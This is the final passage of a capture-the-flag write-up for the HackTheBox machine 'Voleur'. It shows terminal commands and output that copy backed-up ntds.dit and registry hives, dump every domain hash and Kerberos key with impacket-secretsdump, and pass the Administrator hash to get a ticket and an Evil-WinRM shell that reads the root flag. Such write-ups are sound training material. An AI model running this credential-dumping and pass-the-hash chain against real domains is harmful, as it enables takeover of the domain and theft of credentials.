└─$ scp -i id_rsa -P 2222 -r "[email protected]:/mnt/c/IT/Third-Line Support/Backups" ./
ntds.dit                                                              100%   24MB  94.0KB/s   04:21    
ntds.jfm                                                              100%   16KB   9.0KB/s   00:01    
SECURITY                                                              100%   32KB   5.3KB/s   00:06    
SYSTEM                                                                100%   18MB 127.5KB/s   02:20

┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up... 

And finally claim root flag:

┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ impacket-getTGT -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 'voleur.HTB/administrator'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator.ccache
                                                                                                        
┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ export KRB5CCNAME=administrator.ccache   
                                                                                                        
┌──(kali㉿kali)-[~/targetedKerberoast/Backups/Active Directory]
└─$ evil-winrm -i dc.voleur.htb -r voleur.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                         
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                           
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
bec901f7785188b4f4209aa8372657dd
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

That was it for Voleur, hope you learned something new!
-0xkujen